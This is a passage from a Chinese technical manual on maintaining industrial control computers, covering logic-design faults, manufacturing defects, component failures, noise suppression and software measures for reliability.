需要的应用程序的程序)和测试系统(即进行应用模拟和调试应 用程序的程序),使得应用程序的编制趋于自动化。 2。在计算机语言方面,除了目前大量使用的面向过程的语 言外,大力发展面向问题的高级语言,使得编写应用程序更为方 便, 一般技术人员使用接近于自然语言的高级语言就可以简单地 编写适用的应用程序。同时,通过软件硬化等方式,使得高级语 言的效率可以通过一些新型的硬件而大大提高。这对于实时控制 有很大的意义,因为语言效率的提高就意昧着执行同样要求的程 序所需的时间将大大缩短,使高级语言更附合实时控制的要求。 3、为了进一步减轻程序编制人员的工作复杂程度以及进一步保证应用程序的正确性,在模块程序的基础上,由计算机自动 地产生程序的方法,也正在研究之中。这方面的研究成果也将大 大方便计算机在工业控制中的应用。 此外,软件方面对分散处理、并发处理、自动诊断错误、自 动修改错误等的研究以及软硬件两方面冗余技术的发展,都将使 得计算机应用的可靠性和效率进一步提高,这些成就对于工业控 制计算机化无疑也将产生巨大的推动作用。 第二章 工业控制机主机维护 第一节 概 述 我国电子计算机工业在短短的十几年中取得了迅速的发展。 电子计算机的可靠性也逐年提高。尤其是工业控制机,在使用过 程中,广大维护人员积累了丰富的经验。使一些原来只能运行几 个小时、几百小时的计算机提高到几百小时甚至数千小时。从计 算机运行中所发现的故障来看,大致可分为四种: 1. 由于逻辑设计不当引起的故障; 2. 由于制造工艺缺陷引起的故障; 3. 由于元件损坏引起的故障; 4. 由于随机干扰引起的故障。 在处理这几种类型的故障方面,现已有了一些经验。根据工 业控制机的控制对象是连续生产这一特殊要求,以及多年应用的 经验证明:工业控制机能否应用于工业生产的最关键的问题之 一,就是其可靠性如何?本章着重介绍提高计算机可靠性的措施 及其日常维护。供有关人员参考。 第二节 逻辑设计不当引起的故障及其处理 一、时间上的置险竞争引起的故障及其处理 由于逻辑设计考虑不严密引起的故障,在工业控制机中还是 比较多的。下面从几个方面谈谈经常出现的故障及其解决办法。 (一)工业控制机的特点之一是外部设备、外围设备比较 多。由于计算机主机速度比外部设备、外围设备高得多。利用分 时操作可使几个外部、外围设备同时工作。但由于两个系统速度 不一致,各自都有一个固有的工作速度,而互相请求工作是随机的,响应时应保证从完整的工作脉冲开始工作,避免过窄脉冲出 现,否则就会引起工作不可靠。此类问题,在机器出厂时不进行 严格考核是不易发现的。现举一例说明。在调试JS-10A 机模拟量输出时,发现步进电机丢步现象,经分析是设计时没有考虑同 步问题所造成的。 图中MF为振荡器,SC为控制信号,当控制步进电机调节步 数计数器不为零时,此信号为“1”。当没有输出时,此信号为0, 将与门Y封锁。当需要输出时,将调节步数送往计数器,此时 SC打开与门输出开始工作。D 点的环形分配移位信号去控制步进 马达转动,D 点信号同时送到调节步数计数器进行减“1”,调节 完毕。计数器减至0,此时SC封锁与门,调节停止。由于主机 请求输出是随机的,当出现在正脉冲快结束时,此时便会产生如 图中所示的窄脉冲。D 点第一个脉冲为窄脉冲。这个窄脉冲就可 能使计数器计数,因为计数器为D 型触发器,正跳变触发。而环形 分配器由J-K 触发器组成, J-K 触发器是由正脉冲的后沿触发, 要求正脉冲有足够的宽度,在正脉冲高电平期间将引导门打开, 让从属触发器先翻转,在负跳变时使主触发器翻转。若正脉冲很 窄就可能造成J-K 触发器反翻转即步进马达不转。这样就造成调 节丢步,因计数器已减“1”,认为已调节一步,而实际上马达没 有转动。当然,由于输出频率较低,这种差错几率还是比较少的。 从图中看出F 点波形是完整的方波,当C 点窄脉冲能使D型触发器翻转时, F 点波形为F₁即时钟脉冲②开始。当窄脉冲不 能使D 型触发器翻转时,则F点波形为Fz, 即从时钟脉冲③开 始。从第几个时钟脉冲开始是没有什么关系的,只要保证完整脉 冲输出,就能保证工作可靠。 以上解决了启动时第一个脉冲的丢失问题。但该逻辑电路还 存在一个问题,结束时最后一步步进马达丢失很频繁,几乎每次都丢失。 在调节最后一步时正脉冲前沿将计数器变“0000”,此时 SC=0 将与门关闭。所以,最后一个脉冲出不去,只有一个毛刺 信号,这个毛刺信号无法使J-K 触发器翻转,于是造成最后一步 不调节。为解决这一问题,只需将引出信号变一下,就可让最后一个完整脉冲输出。 从图中可以看出,只需将计数器减“1”信号改在反相器前 面,就能保证最后一个脉冲为完整脉冲输出。经修改后计数器是 用正脉冲的后沿来关门,此时该脉冲信号已完整发出。从上面的 例子可以看出,在两个非同步系统工作的情况下,在开始和结束 时,都有可能出现不完整脉冲,导致工作不可靠。所以,在逻辑 设计时, 一定要考虑同步问题。其实现方法很多,此例是采用加 一个同步触发器的方法。 (二)逻辑设计时,在时间关系上应宽余一些,以保证单元 线路不要在太高频率下工作。 现举例说明:如图2-5的2421编码十进计数器,其编码规律 为:0000→0001→0010→0011→0100→0101→0110→0111→ 1110 →1111→0000 该计数器是利用计数器由0111→ 1000时,高位由“0”→ “1” 的阶跃信号将C₂ 、C₃ 置“1”,即编码中由0111 → 1110时中间有 一个过渡状态1000,中间C₂ 、C₃ 两位在这一过程中先是由“1” → “0”,然后再由“O”→“1”, 这就要求双稳灵敏度很高,否则第二次就不能翻转。这样就造成工作不可靠。在设计时,应尽量 避免此种工作情况。可采用在高位由“0”→ “1”后经单稳延时一 段时间,再将C₂,C₃ 两位置“1”。当然,也可以采取其它办法。 (三)在逻辑设计时应尽量避免二次翻转。如计数器是采用 上面一位推一位的工作方式,就不能采用脉冲阶跃信号进行清零 (即不能采用微分触发方式)。例如计数器原状态为0101,在 清 零 时 则 相 当 于 实 现 : 0 1 0 1 + 0 1 0 1 = 1 0 1 0 。 此 类 计 数器最好采用先置成“1111”,然后加“1”的办法消零。或 者采用电位清零的方式,因作用时间较长,比较可靠。 由于逻辑设计考虑不严密,产生冒险竞争,在机器故障中是 较多见的。上面只举了常见的几种情况。这种冒险竞争,在运行 中往往引起机器偶然性故障。在处理时,需经多次观察后方能着 手解决。 二、恢复时间不够造成的故障及其处理 在采用微分触发工作方式时,尽量考虑采用脉冲前沿触发。 尤其是所要驱动的双稳很多的情况下,尤其应注意。例如驱动一 个16位寄存器。此时负载很重, 一定要用前沿,否则会由于恢复 时间不够,引起触发幅度不够,而造成不可靠。 从图2-6中看出,当带载较重时,微分信号恢复时间拉得很长。 使AV₂<△V; 若用△V₂ 作为触发信号其辐度就不够。在使用时若采用正触发就用左图,若采用负触发则用右图。总之,用前沿触 发能保证有足够的触发幅度。 三、毛刺干扰引起的故障及其处理 在逻辑线路中,要求高的部件应尽量避免出现毛刺现象。如 中央控制器的节拍信号,最好不要采用异步计数器加译码的方 式。因为计数器一位推一位的工作方式,中间有很多过渡状态,这 些过渡状态就会在译码器输出端产生毛刺信号。现举例说明:计 数器由1111→0000时是先变为1110,然后再变成1100、1000,最 后才成为0000。中间1110、1100、1000均为过渡状态。这几个过 渡状态,会在相应的译码器输出端产生毛刺信号,这些毛刺信号 就有可能使有关逻辑线路产生误动作。所以,关键部位若采用计 数器加译码方式,则计数器应采用同步工作方式。 四、带载能力差引起的故障及其处理 逻辑线路中,往往由于带载能力差,造成波形变坏和幅度下 降,使机器工作不正常。 一般采用分载或加两级反相器整形,或 者改为大功率驱动器等办法加以解决。 第三节 逻辑设计上提高可靠性的措施 一、指令设置非法操作码 指令编码中有的代码不用,若执行中发现非操作码,则为非 法操作,发出错信息。例如,不少机器将操作码为00编码称作空 操作。因当程序破坏时,程序乱执行,就可能转到一些常数单 元,这些常数单元操作码部分大多为零,就发出空操作信号。有 时,由于干扰将磁芯冲零,操作码变为零,也会发生空操作。这 样能及时发现机器工作不正常,便于查找故障。 二、代码传送采用奇偶校验电路 逻辑设计中采用奇偶校验电路,能帮助人们尽快发现机器故 障及其出错地点。有的小机器无奇偶校验电路,当发现偶然跳动 时很难查找原因。奇偶校验的基本思想是:在代码传送过程中, 增加一个奇偶校验位,该位不参加运算,只作校验用。在传送时,可根据设计,将代码中“1”的个数由奇偶校验位配成奇数 (或者偶数)。若回传时由奇数个“1”变为偶数个“1”(或者 相反变化),则发出校验出错信号。在机器中采用较多的地方有 磁鼓、磁芯存贮器,它们在取数时进行校验,纸带输入时也进行 校验。 其逻辑电路实现的基本思想是求代码和。把一个代码的所有 位,利用全加器或半加器,逐级加起来,最后得到奇数个“1” (或偶数个“1”)信号。这样检查方式有一定局限性,只能发现 奇数个错误(或偶数个错误),而对于偶数个错误则无法发现。在 正常运行时, 一位出故障的几率比多位出故障的几率要大。所 以,在实际应用中是很有价值的。 三、设置死循环报蓍和停机报警 目前国内所使用的计算机,基本上都加上了停机报警线路。 但在工业控制机中,往往会由于一个中断回答信号丢失等原因而 造成死循环。使机器失去正常的控制功能,这种情况经常不易被 人们发现。加上“死循环”报警和“停机”报警后,可以迅速告诉 值班操作人员机器已停运。实现的基本思想是:如果在一定时间 范围内机器不进行正常调节,则发出“报警信号,或自动再次从头 启动程序。这里介绍一种简单实现方法:机器里设置一个计数 器,正常调节时,每一个采样周期将它清零一次。该计数器由一 秒时钟给它计数,假设调节周期为2秒,则计数器在正常情况下 最多只能计到2就被清零若工作不正常,计数器计到十秒,机器 就发出报警信号,或自动再次从头启动程序工作。这样能大大减 少由于偶然误动作造成的停机,也便于及时发现故障。 四 、内存开辟封锁区 对于内存中一些常用的不需改变的固定程序可由排码开关选 择地址进行封锁。封锁区内只能读不能写。若特殊情况下需要写 时,可设置“解除封锁”触发器,写完后再重新封锁。例如内存 容量为4K, 假设我们封锁的区域为0000~0511,K 为开关条件,K=1 表示封锁, f 为封锁内存信号,只有 当D₁₂=D₁=D₁=0 时f=1 。 即最高两位为零时(地址最多为 12位的情况),同时,D₁o也为零时,内存为封锁区。即实现封锁 0000~0511。当K=0 时,即不封锁内存, f=0 。 采用内存开 辟封锁区后,能保护内存,同时能及时发现机器故障。例如当机 器误操作,向封锁区内写数时,点亮内存封锁灯,发出出错信号。 五、采用只读存贮器 只读存贮器,就是只能读不能写的存贮器。由硬件固定制成, 即所谓软件固件化。采用只读存贮器能避免冲程序引起的机器故障。对于专用机特别适用。目前,国外生产的微处理机基本都配 有半导体只读存贮器(ROM) 。 为了便于修改,可采用可改写的 只读存贮器(PROM) 。 利用紫外线照射或电信号,可抹掉原有内容。根据需要重新写入新内容。目前,国内的一些控制机也有采 用ROM 存贮器以提高计算机的可靠性。 六 、避免烧毁大功率放大管的措施 大电流驱动源最好采用单稳作驱动级。比如步进电机功放, 内存驱动源等。如用双稳作前级控制电路。往往会由于双稳工作 不可靠,使功率管常通,造成烧坏大管子。因功率管工作在脉冲 状态,其负载为变压器。若在直流情况下导通,由于变压器直流 电阻很小,会导致功放管电流很大,使管子烧坏。若用单稳态的 暂稳态去控制功率管导通,则不会引起烧管子。除非单稳中一个 三极管烧坏使功放管常通。在正常工作情况下或单稳误动作,都 不会造成烧管子。因为单稳经过短暂时间的暂稳态后总是停留在 稳定状态,而稳定状态是使功放管截止的。所以,建议大功率驱 动源前一级控制信号最好采用单稳电路,以避免过流烧坏大功率管 。 七、掉电保护措施 逻辑设计中应考虑启停电时保护内存信息。在实际应用中可 采用供驱动源用的内存高压,在供电时比其它逻辑电源后供,在 高压未供以前,发出全机置零信号,使控制触发器都置于初始状 态。既不执行任何指令,内存也不执行读写,这样,能实现保护 内存信息。掉电时采用先掉内存高压后掉逻辑电源,同样道理能 保证内存信息不破坏。有的功能较完善的机器在掉电时,当电源 下降到一定幅度时给机器一个中断信号,机器立刻执行有关程 序,将现有寄存器及有关控制触发器信息送到内存内保存。重新 启电后,可在原中断点继续工作。在掉电保护时,若考虑外界电 源有时有短时间高频振荡,会造成频繁的启停电,这时可采用加 一延时继电器,过一段时间后才重新启电。采用半导体存贮器的 情况下,掉电时信息将全部“挥发”,此时可采用内存专用备用电 源或蓄电池来实现内存保护。 第四节 制造工艺不良引起的故障及其处理 由于制造工艺不良引起的故障,有的机器是很严重的,甚至 造成机器根本不能使用,只好推倒重来。尤其是接触不良,虚焊 等故障,很难查找。往往变成计算机的老大难问题。可见制造工 艺是必须重视的。同时在作结构设计时应考虑使用和维修方便的 问题。现将经常出现的故障及其处理办法介绍如下。 一 、断线 在长途运输过程中由于振动造成断线较多,有时也由于工作 不小心造成断线。个别地方也有老鼠将线咬断。此类故障出现较 多的地方为活动连接插头根部,在插拔多次后造成断线。因此活 动插头座最好外加一个夹子,固定在插头座上,使插拔时导线焊 接点不致受力。活动线最好采用多股软线,不易折断。在用螺钉 紧固电源线及信号线时,也会由于线比较短,受力太大,造成断 线。或者螺钉拧得不够紧,造成连线脱落。所以,此类连接线不 要拉得太紧,稍长一些较好,同时紧固螺钉要拧紧。有时也发现导线外面绝缘层是好的,里面导线已折断。此类故障不太直观, 在查找时要一步一步追查。印刷电路板多焊几次后,由于受热, 也会造成铜箔断线。所以,在焊板时,时间要短。焊接多次后要 检查有无铜箔断裂或脱落的地方,若有应及时处理。元件腿有时 也会发生断裂,造成时通时断现象。外观上如不仔细看,则检查 不出来。因此这类故障有时较难处理。当确诊某块板有故障,其 检查范围缩小,处理就快一些。断线故障中,时通,时断的情况 处理起来比较困难,可加以振动,使其完全断开。或仔细检查有 关易断线的地方,仔细进行查找。对于完全断开的线,只需一级 一级观察波形,发现到什么地方信号没有了,而中间只有一根连 接线,则可证明为断线。若根部断线,则重新焊上。若中间断线, 则更换一根线。此类故障在调机初期较多,投入正常运行后一般较少。 二、短路 造成短路的原因一般可分为三种。 (一)制造工艺不良引起的短路故障 此类故障出现较多的是,布线线头裸露部分太长,造成线间 短路或与底板短路。也有焊点太大造成短路的。插头、插座的连 接线焊点,如没有加套管,则易造成线间短路。在处理此类故障 时,要使焊头裸露部分尽量短。需要加套管的地方, 一定要加套 管。焊点要小而光滑。用螺钉连接的接线端子,接头多股线没拧 在一起,有毛刺,容易造成与其它端子短路。或螺钉松动,线头 与其它端子相碰短路。所以,在连接时,接头处的多股线应拧在 一起,线头裸露部分不要太长,线头固定方向应与螺钉紧固方 向一致,这样就比较牢靠。制造工艺上出现较多的短路故障,是 接插件短路。 一种是印刷板腐蚀时,插头部分严重错位,稍一振 动就造成短路。这种插件板应重新制作。另一种是插座簧片损坏, 造成短路。目前国内生产的插座,大多质量较差,多插拔几次后, 簧片就坏了,造成短路,只好换簧片或插座。插件板插拔时,也 会由于元件碰撞或与机壳碰撞造成短路。所以制造时,插件板间的空隙不要留得太小。有的机器出厂时,插件板间就要加绝缘板 隔开,这是很不妥当的。 (二)元件损坏引起的短路故障 在运行中,由于半导体元件损坏,电容击穿等,也会引起短 路故障。此类故障往往引起电源过流掉电,或信号接地。解决办 法是更换元件。若由于元件使用不当,则应更换元件,以避免再 发生类似故障。 (三)维修时不注意引起的短路故障 在维修时,用示波器观察波形,或用万用表量电压时, 一定 要使用裸露头很小的测试笔,或采用外面包有绝缘套的空心测试 头套在插座腿上,以避免造成短路。有时为了观察某些信号,随 意外加封门接地信号进行检查,造成信号对地短路可能烧坏晶体 管。例如:跟随器输出端不能接地,若接地会由于没有负载电阻 使电流过大而烧坏管子。在焊插件板和机柜布线时,也会由于焊 锡渣的影响造成短路。另外往往在排除故障时,又会人为的制造 一个新的短路故障,因此需要小心从事。 此类故障一般还是比较容易查出的。通过示波器可逐级看波 形。若到某一级无波形,可将后一级断开看是否由于负载引起, 若断开仍不好将插件板输出腿与外电路断开看有无输出。若有则 说明是底板布线有短路。若没有,则肯定是插件板本身的问题。 也可由前逐级向后检查。 三 、接触不良 引起接触不良的原因大致可分为三种。 (一)制造工艺不良引起的接触不良 接插件质量不好、簧片无弹性以致损坏、或者插件板变形等, 都会造成接触不良。在机器设计时,应尽量减少转接插头,以减 少接插件接触不良引起的故障。印刷电路板尺寸较大时,应采用 加强筋的办法防止其变形。转接插头插座应相互固定牢固,以免 引起接触不良或脱落。 (二)振动引起的接触不良 由于机房环境有强的振动源,造成机器接插件松动,也会引 起接触不良。所以,在机房设计时,应考虑机房附近无强振动源。 同时机房设计时应适当考虑防震措施。否则会由于振动较大,造 成计算机不能正常工作。 (三)腐蚀气体造成接插件腐蚀和氧化所引起的接触不良 由于氧化和腐蚀气体的腐蚀使接插件部分发黑造成接触不 良。可采取定期清洗的方法加以处理。个别腐蚀厉害的地方,可 采取清洗后镀锡的办法。有的单位采取此办法后效果显著。 此类故障查找起来比较困难。经常是时好时坏。所以,必须 作过细的工作,经过长期观察后,方能着手解决。 四、虚焊的处理 虚焊大多由于元件腿清洁工作作得不好,表面有氧化层或绝 缘漆等脏东西而造成。有时也可能由于焊剂用得太多造成虚焊。 所以在更换元件,更改机柜布线时应力求杜绝虚焊。由于有的虚 焊点,可能经过较长时间才暴露出来。因此虚焊是计算机稳定可 靠运行的一大敌人。制造或维护时, 一定要重视焊接质量。 第五节 元件故障及其处理 一、集成电路及其它半导体元件故障及其处理 元件损坏造成的此类故障比较容易查找。逐点观察波形就可 以查找出来。处理办法一般采用更换元件,就可以排除故障。难 查的是元件性能变坏,造成机器工作不稳定,时好时坏。这类故 障可采用恶化条件,变电压、升温、变频等办法找出不可靠因素, 加以排除。也有的机器采用质量不稳定的元件,即使更换元件, 也仍然不可靠。此时,应采取更换其它产品的办法解决。下面着 重介绍一下TTL 集成电路的使用及运行情况。 (一)组件失效情况 整机中组件在初期失效比较多。 一般计算机经过一年左右时 问运行后能淘汰掉一部分元件。 一年以后计算机就比较稳定。从 失效率来看一年有一个波峰波谷。主要受环境温度和湿度的影响。 据有关资料介绍,湿度从50%下降到30%,组件的失效率可以降 低一个数量级。所以,潮湿季节的失效率比干燥季节的失效率高 得多。有的产品由于漏气严重,湿季失效率约为干季的20 倍。 一般灌封的比空封的密封好。中期失效的情况绝大部分为漏气造 成。即使在相对湿度较低的情况下,漏气也会促使组件内部的化 学、物理变化加剧。所以元件在制造时应保证密封性能好。 (二)组件失效类型及原因分析 对计算机维护人员来说,要解剖分析失效电路,是极其困难 的。 一方面缺少相应的仪器设备;另一方面,早期生产的灌封电 路是很难完整无损地拆开的。我们只能从使用者的角度,从组件 的外特性着手,进行一些测试、归类,从外特性说明一些导致失 效的原因。 1。失效比例最大的是动态失效,在失效中所占的比例,中 期比初期高,后期比中期高。 2。组件内部短路极少出现。 出现较多的是机械损坏,大量表 现为内、外引线断。关键腿断引 起的失效比例,早期比中期大。 组件失效的主要原因有如下 几个方面: 1. 氧化硅绝缘层击穿 绝缘层太薄,在氧化时由于 表面不清洁而留下的针孔,都可能造成击穿。有时输入腿门电流 剧增到数毫安,主要是由于倒相 管T₂的集基极击穿或短路引起,常常并非是结的击穿,而是集极铝膜引线跨越基极时,绝缘层击穿。当π输入腿处 低电平时,E。经 R₂ 再经击穿路径流入 T, 集极灌向驱动源。设 R₁=3KQ,R₂=750Ω,T饱和,则输入腿正向电流IE可能达到:实际测得 增大的组件,其值为4~8mA 不等,这是因为击 穿后阻值不尽相同、Iπ的增大,表现为高电平下降。因为输入低 电平时,由于 T₂ 的集基极短路, R₂ 上降掉一部分电压。中期失 效的组件,I 剧增的较少。 2. 机械应力、热应力过载 关键腿的内、外引线断裂的故障,大多为外引线断。 一方面 是扁平封装组件的引线腿形状不佳,不仅截面积小,而且很薄, 在测试和加工插件板过程中受了损伤。另一方面,早期的浸金引 线质量不好,有的组件露出科伐合金(铁镍钴合金),镀不上锡。 因此,刮去表面氧化层时,引线受伤。在长期使用中,在热、湿、 通风、不清洁等恶劣环境条件下被氧化腐蚀。 至于内引线断,除热应力、机械应力等原因外,压焊点的质量 不良及铝膜断裂是主要因素。有虚焊点的组件,大多能在例行试 验中被淘汰;焊点有效面积小,电流密度大,局部过热而造成开 路;以及长期使用过程中焊点疲劳和缓慢氧化等因素都可能造成 早、中期引线断裂失效。 3。组件内部原因 除前述绝缘层击穿外,组件内部引起失效的原因是十分复杂 的。如基片缺陷、图形误差、台阶上铝膜断裂、铝膜引线过细、 金属化学作用、电迁移作用等等,都可以造成组件参数、性能的变化以至于组件的突然失效。 4. 漏气 对于扁平封装的组件来说,漏气较为普遍,它是中期失效的 主要原因。上述几项失效原因均与漏气有关。由于漏气,促进和 加剧了内部键合、引线焊点、金属化学腐蚀等方面的损坏。漏气 来自两个方面: 一是产品出厂时,气密性能差,二是用户造成。 用户造成漏气的原因较多,如早加注意,是可以减少的。如测试 时,由于夹具不平整,接触簧片没有足够的弹性或表面氧化,往 往就将夹紧的力加得很大,使组件外引线受很大的机械张力,与 封装的环氧材料之间发生松动,产生气隙。当用锡锅镀外引线腿 时,如果浸锡时间过长,或浸锡离根部太近,造成引线腿局部高 温,与陶瓷片及环氧材料之间的相对温差造成膨胀程度的差异, 导致引线腿松动。组件装上印刷电路板前,要把外引线腿压成合 适的形状。压腿模具不合适或操作方法不对,将给引线腿很大的 拉应力,影响气密性。组件装焊时,应允许印刷板有一定变形余 地。由于印刷板刚度较差,不可避免会产生弯曲等变形,尤其是 在拔插插件时,这种变形经常发生。若焊接时无变形余地则很小 的变形都会给引线腿以很大的张力,导致密封处松动,影响气 密性。 中期失效的组件,每年夏秋两季失效较多。冬春两季失效较 少(冬季遇雪天,也会出现在局部时间内失效率增加的情况)。 这主要是湿度对组件的影响。湿度能明显地影响组件的失效率, 证明了漏气是组件失效的一个重要原因。 5。装修过程中造成的失效 加工中损坏的主要原因: (1)锡锅与烙铁的接地问题。由于锡锅电阻丝和电烙铁漏电,手拿组件腿镀锡时, 一方面结的反相阻抗大于人体电阻,另 一方面结电容小于人体对地电容,故较大电压降在结上,易造成组件的损坏。 (2)镀锡时,酒精和松香的液体部分会顺着组件腿向上游 动。其蒸汽部分向上升腾。 一方面使各外引线之间不干净,容易 沾染其它脏物,造成表面漏电。另一方面,对于本来密封就不好的组件,蒸汽进入,造成失效。所以,镀锡时应采用超声波锡锅。 少蘸松香水,锡锅表面经常刮干净,缩短镀锡时间。 (3)加工中产生的外引线断,当时就可更换,对于内引线 断的组件,只能在正确性初测中发现。所以,加工工艺是关系集 成电路在使用中的可靠性的一个重要因素,其影响不仅表现在早期失效,而且中期失效也很明显。 (三)动态失效 随着组件失效率的下降,机器发生故障的次数大为减少,总 的维修时间也减少了,但排除一次故障的时间,却比以前增加了。 对于坏死的组件,故障很易排除,而且大部分只要用一块万用表 即可找出。而对于动态失效的组件,有时可用示波器找到,有时 只能从逻辑上去判断它是否失效,有时因频率太低,只能用一套 监视线路去检测某处有无脉冲通过,手续十分繁琐。机器上动态 性能确实不好的某些组件,换下后在静态测试台测试,往往被认 为“误换”。中期失效中,动态失效会超过全部失效组件的一半。 无论从故障数量上,还是从排除故障的时间上,都要求我们十分 重视研究动态失效问题。 以上着重介绍了TTL 集成电路的故障情况。三极管、二极管 也有类似的问题,在这里就不一一叙述了。三极管在使用过程中, 动态特性也会发生变化,造成工作不稳定,管子的β和Tco 也会 发生变化,造成饱和式开关电路过饱和或者不饱和。在过流功耗 大等情况下会产生热击穿。热击穿一般能自动恢复。过流、过功 耗也会造成管子损坏。pn 结也会由于反向电压过高造成击穿。 管子损坏一般表现为pn 结烧结和pn 结断开两种情况。目前,在 正常运行中由于三极管自然损坏的情况很少。有的计算机内存导 流二极管由于电流较大,出现烧坏的情况较多。半导体元件的故 障比起电阻、电容来要多得多。尤其在初期是很多的,到后期就 比较少一些。 二 、电阻电位器故障及其处理 在实际应用中,电阻出现的故障是很少的, 一般不易损坏。 少数大功率管的负载电阻,由于三极管烧坏,造成电阻过功耗而 烧坏。也有的电阻本身温度性能差,在受热时阻值发生变化,影 响正常工作。电位器的故障比起电阻来稍多一些。尤其是经常调 整的电位器。例如步进马达驱动源的多圈电位器,整天在不停的 调整,会造成磨损引起接触不良或断路。 一般电阻、电位器坏了 可采取更换元件的办法进行处理。在选取和应用电阻时,应从电阻的基本性能与数据,以及结构和规格出发,主要有以下几点: 1. 决定标称电阻值与误差等级。 2. 根据工作电压与击穿情况,决定标称功率的大小。 3. 根据稳定度的要求,决定电阻温度系数与电压系数。 4. 根据频率的变化情况,考虑电阻与频率的关系。 5. 根据使用场合,考虑电阻老化对线路的影响。 6. 根据环境温度和工作温度,考虑电阻耐热性能的好坏。 7. 在某些场合,考虑电阻噪声的影响。 8. 根据安装情况的不同而选择不同结构特点和型号的电阻, 并注意减小其引出线间的分布电容和固有电感。 9. 在特殊场合中要考虑电阻的防潮性能、抗酸碱的性能。 10. 在经济方面力求价廉。 在要求稳定度高,误差小的线路中最好选用金属膜电阻。 三、电容器引起的故障及其处理 电容器损坏造成的故障比电阻多得多,其中损坏最多的为电 解电容器失效。电解电容器由于绝缘电阻低、损耗大以及发热严 重等,造成电解电容干枯老化而失去电容的作用。另外,电解电 容工作电压上限不够高往往造成电容击穿。此外,纸介质电容器 在使用时,也易发生击穿现象。所以,在元件选取时,应考虑稍 保守一些。在选用时一般应考虑以下几个方面: 1. 根据不同要求,决定额定电容量和误差等级,并考虑电 容量与温度及频率的关系,保证满足稳定度的要求。 2. 根据工作电压和工作频率决定额定功率的大小。 3. 根据工作环境的不同来进行选择,例如,环境温度较高 时,选择不易产生高温老化的介质制成的电容器。 4。在选用电容器时,不仅决定电容器的电气性能,而且, 还要考虑它的体积、重量和价格。因此,在选用电容器时应当尽 可能地以最小的体积和重量以及最低的成本求得电容器必要的电 气性能。 5. 据安装要求,选用一定外形结构,采取一定固定方法的电容器。 本节主要介绍元件引起的故障,从故障率来讲,半导体元件 最高,电容次之,电阻最低。明显损坏,此类故障易查,而性能 变化查找较难,需要我们经过多次观察、实验、从中找出规律性 的东西来,才能着手解决。 第六节 提高线路的抗干扰能力 一、增加门、反向器的抗干扰能力 对于集成电路的门、反相器的输入端有干扰,在速度允许的条 件下,可适当添加一个几百到上千 pF 的电容;对于分离元件,可 在经常导通的三极管的基极-集电极之间并一个几百pF 到1HF的 电容,对提高线路抗干扰能力有明显效果。例如当干扰信号进入 线路时。由于电容的延时作用,电压不能突变,干扰波就不会使 三极管翻转,另外电容还有负反馈作用,能削弱干扰波的强度。 对于经常截止的三极管,抗干扰电容应加在基极-发射极之间。 这样,当有干扰信号输入时,会被电容旁路,达到抗干扰的目的。 二、减小线间串扰 当某导线与流过大电流的导线平行时,易产生电磁感应,造 成线间串扰。在主机中磁鼓、磁芯信号小,怕受干扰,可采用双 绞线或同轴电缆连结,以减小线间串扰。对于强的干扰源,如自 动启停打字机等,对机器其它逻辑线路有很大干扰。此时对强的 干扰源也要加以屏蔽,以防止其干扰扩散。同时,在开关接点处 并接滤波电容(一般0.2~1HF左右)。采取以上措施后,能大大 减少线间串扰。 三、电源噪声的克服 为避免脉冲信号经电源而相互干扰,要在电源端加大电容滤 波。但经长引线传送时,由于电感的作用,又使滤波不好。为此, 还要在汇流排和插件板上加滤波电容。为了有效的滤波和去耦,电容器能提供的瞬态电源的周期,必须大于电流脉冲的宽度。由 于逻辑状态改变引起的直流变化及其有关的瞬态效应是同时出现的。所以,必须考虑两个不同的时间常数。快速瞬变效应要求电 容器具有低值阻抗,而长周期则要求足够的电容量。故采用两种 电容一种是脉冲性能好的高频电容, 一般选取0.01AF左右。另一 种为低频电容,可采取10~50HF 左右。经过滤波后是否满足要 求,可用示波器观察电源各点电压的波形,看其干扰是否在允许 值之内。根据干扰波出现的地点和时间,还可找出引起干扰的那 些插件,从而设法加以抑制。 对于干扰的克服,有关章节还要作专门论述。本章只介绍前 面几种克服主机干扰的方法。干扰信号往往造成机器工作不稳定。 在调机中的可靠性调机阶段大量工作是解决干扰问题。在使用过 程中也会由于有关电气设备、环境条件的影响干扰计算机的正常 工作,在处理时应作过细的工作,才能解决。 第七节 利用软件提高机器可靠性 一、偶然跳动引起的异常的克服 为了增加计算机连续运行时间,可以采用软硬件结合的办法, 利用监视程序处理局部性故障,效果较好。从长期机器运行情况 观察,发现只要不出现恶性故障,时钟中断总是在可靠地运行, 因此监视程序也就能在时钟中断的管理下进行运行。监视程序要 作三方面的工作。 (一)定期对机器薄弱环节的工作情况进行巡回处理。 (二)对各级目的程序运行情况进行巡测处理。 (三)定期给出表征机器运行正常的特征讯号。 机器的薄弱环节有:模出丢回答,模入丢回答,开出丢回答, 制表机、控制台打印机不动作等。 检查的方法是:在使用各通道时,首先设置一个对应状态字 IOS (输入输出状态字),当回答信号到来时,就将IOS清除。监 视程序工作时,先判断各通道是否在工作状态;如果IOS≠0, 就 表示丢了回答,这时程序便根据原先特征,补一个回答信号,以 解除通道堵塞,并打印标志。如上述情况出现多次,就打印报警,关闭该程序。这样,可以避免一些偶然跳动造成的停机,能自动 恢复执行正常的工作程序,从而提高机器的可靠性。 二、采用代码检查的方法,提高指令和随机调鼓的可靠性 某些小型计算机没有磁芯奇偶检查功能,对磁芯偶然性故障 难以发现,即使指令被破坏也不停机,如发现早,及时处理尚不 要紧,发现迟了,则会影响生产。针对这一情况可增加代码检查 程序。即在一个调节周期开始时,将工作程序的所有指令按位加 一次,并与以前保留的代码和进行比较,看其是否相等。如相等, 则说明指令无变化或有偶数位发生了变化。由于一位出错的概率 比二位以上出错的概率大得多,故可及时发现大多数的偶然出错, 进行报警或其他处理。 此方法也可用于一些自动调鼓程序,即对从鼓中调出的程序 进行代码和检查,看与写鼓时的代码和是否一致。如不一致则重新调鼓,多次调不出就打印报警,从而可改进随机调鼓的可靠性。 三、利用外存的后援作用保护程序 将重要的程序或数据预先存放在磁鼓等外存设备中,当内存 运行发生偶然出错时,由程序进行判断,并自动转到调鼓程序,调 出预先保存在外存中的程序,以恢复被偶然冲掉的程序。 一次不行,还可以多次调鼓以期恢复。当多次调鼓后仍不能恢复正常时, 则进行打印报警,由操作人员及时处理。 四、溢出处理 增加溢出处理程序,实现运算溢出既不停机又能报警,减少 停机次数。在计算机运行过程中,由于种种原因,例如,操作人 员设数错误,以及控制回路取平均时次数累计有误等,均会造成 运算溢出。 一般计算机设计时,均有溢出停机的逻辑线路,而这 种停机一般并非由于机器硬件设备故障引起的。为了减少这种停 机的次数,可在硬件上改进逻辑线路,即加设“溢出不停”开关, 使出现溢出信号时, 一方面能发报警信号, 一方面将指令计数器 